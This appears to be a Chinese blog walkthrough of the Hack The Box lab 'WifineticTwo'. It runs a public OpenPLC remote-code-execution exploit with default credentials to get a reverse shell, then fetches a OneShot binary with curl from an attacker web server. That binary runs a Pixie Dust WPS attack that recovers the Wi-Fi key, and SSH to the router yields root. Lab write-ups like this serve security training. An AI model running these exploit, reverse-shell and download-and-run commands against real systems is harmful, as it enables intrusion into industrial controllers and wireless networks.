返回
Featured image of post [HTB]WifineticTwo

[HTB]WifineticTwo

信息收集

端口扫描

image-20240407131704840

开放端口22,8080

Web 信息

访问 web 服务80端口,发现open PLCWeb 界面

image-20240407163659438

searchsploit openplc

查找到远程命令执行漏洞

image-20240407163850480

漏洞利用

反弹 Shell

执行searchsploit -m 49803复制EXP,然后修改 exp 中的

compile_program = options.url + '/compile-program?file=blank_program.st'
#修改 file 名如上

然后执行

python3 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.39 -r 7777

新开一个 window 监听7777端口,等待脚本执行完毕获得 shell.

image-20240407164232997

直接前往root目录找到user.txt,提交后寻找 root flag 找不到,感觉不对。

image-20240407164343920

提权

执行ifconfig,发现一个网段地址。

image-20240407164701867

猜测这可能是一个 Web 容器,并不是物理机。

查询资料后得知可以利用Pixie Dust attack攻击wlan0网卡。

下载OneShot源码,执行

#攻击机
gcc -o hack oneshot.c
python -m http.server 80
#靶机
curl http://attack-ip:port/hack -o hack
chmod +x hack
./hack -i wlan0 -K

获取到了 Wi-Fi 的 creds:plcrouter:NoWWEDoKnowWhaTisReal123!,连接 Wi-Fi.

修改配置文件/etc/wpa_supplicant/wpa_supplicant-wlan0.conf,

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
  ssid="plcrouter"
  psk="NoWWEDoKnowWhaTisReal123!"
  key_mgmt=WPA-PSK
  proto=WPA2
  pairwise=CCMP TKIP
  group=CCMP TKIP
  scan_ssid=1
}

修改配置文件/etc/systemd/network/25-wlan.network,

[Match]
Name=wlan0

[Network]
DHCP=ipv4

执行命令

systemctl enable wpa_supplicant@wlan0.service
systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service

已经获得 IP

image-20240407170435581

可以看到 Wi-Fi 的 DHCP 分配了一个 IP 地址,按照正常逻辑往上推,网关地址为

192.168.1.1,直接访问ssh root@192.168.1.1

image-20240407170600351

成功获得root flag:3ffc6b858fa9477312acc374103072f5

Licensed By 猫南北
最后更新于 2024 年 12 月 30 日 18:23